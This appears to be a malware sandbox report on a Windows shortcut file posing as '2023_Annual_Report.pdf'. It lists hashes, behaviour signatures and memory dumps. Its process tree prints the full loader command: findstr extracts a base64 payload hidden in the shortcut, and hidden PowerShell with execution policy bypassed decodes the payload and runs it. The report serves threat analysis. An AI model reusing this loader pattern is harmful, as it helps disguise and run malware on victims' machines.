Overview

overview

8

Static

static

1

2023_Annua...df.lnk

windows7-x64

3

2023_Annua...df.lnk

windows10-1703-x64

8

2023_Annua...df.lnk

windows10-2004-x64

8

2023_Annua...df.lnk

windows11-21h2-x64

8

Analysis

  • max time kernel
    1215s
  • max time network
    1219s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-12-2023 21:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2023_Annual_Report.pdf.lnk

  • Size

    55KB

  • MD5

    bbc4414d76d1a765f3d525556f616ef9

  • SHA1

    c73e28d87fbbc8be79ed1d421e78a41c29111a86

  • SHA256

    86f504dea07fd952253904c468d83d9014a290e1ff5f2d103059638e07d14b09

  • SHA512

    2a7204e361ace1c5c03bc240b985d09cc1f1e67dce025dca5ac9d450bc7193e456d3602ab557abd9bd7ec4d96815e41df06cdce9359379b32c0e777aa9d54be7

  • SSDEEP

    768:NLoFJQeDHeGYyhA5Z7JsCVResXebqwVCYm7/k/m7RU6d/dwiuGIjsZL2RxcNRyxc:NLBWYX5Z7JsCVCbqECB7cOm0OoxUURV

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\2023_Annual_Report.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk > "C:\Users\Admin\AppData\Local\Temp\Temp.jpg" & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\Admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\system32\findstr.exe
        findstr /R "CiRFcnJvckFjdGlvbl" 2023_Annual_Report.pdf.lnk
        3⤵
          PID:2256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content "C:\Users\Admin\AppData\Local\Temp\Temp.jpg"))) | POwERsHElL"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3036
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2584

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Temp.jpg
      Filesize

      7KB

      MD5

      50514f94115e319477095fbefa61257e

      SHA1

      004b3b8e4ace16db6fc954c10decf8856617ef12

      SHA256

      4339e02a2557b36934baf68b6e97daae04a3e118da2a66915e6200579594d8c6

      SHA512

      47f6a6f52e02cb7365e70e1637ad0f6e4c96c6f156ad794f3583eb8cbf1dc9af3b8a921ca2c754c2636bba2c2c6991204930502d171b2b41b72af78bfb7e2a49

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      e282182c508d95b13bd9cc6fdd0a9ae0

      SHA1

      103262f3e49cdd4ddc49dcbb9487a7708bb1ca6c

      SHA256

      87e3b8dac0ebd421f8358a2b5204577e80e96d53fb1335e6d563a6959e811a2e

      SHA512

      4ec75bec57e782de93eac2c41f1314676ed0b523b2632549867081f7d68f9f5cd36ebb7c8f041e34f8256173d444c8ba9d38283176b362950344366fe05ca8a2

      Download Submit
    • memory/2584-54-0x00000000029F0000-0x0000000002A70000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2584-66-0x00000000029F0000-0x0000000002A70000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2584-65-0x00000000029F0000-0x0000000002A70000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2584-64-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2584-58-0x00000000029F0000-0x0000000002A70000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2584-57-0x00000000029F0000-0x0000000002A70000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2584-56-0x00000000029F0000-0x0000000002A70000-memory.dmp
      Filesize

      512KB

      Download
    • memory/2584-55-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2584-53-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/3036-45-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/3036-46-0x0000000002650000-0x00000000026D0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/3036-39-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
      Filesize

      2.9MB

      Download
    • memory/3036-44-0x0000000002650000-0x00000000026D0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/3036-43-0x0000000002650000-0x00000000026D0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/3036-59-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/3036-60-0x0000000002650000-0x00000000026D0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/3036-61-0x0000000002650000-0x00000000026D0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/3036-62-0x0000000002650000-0x00000000026D0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/3036-63-0x0000000002650000-0x00000000026D0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/3036-42-0x0000000002650000-0x00000000026D0000-memory.dmp
      Filesize

      512KB

      Download
    • memory/3036-41-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/3036-40-0x0000000002620000-0x0000000002628000-memory.dmp
      Filesize

      32KB

      Download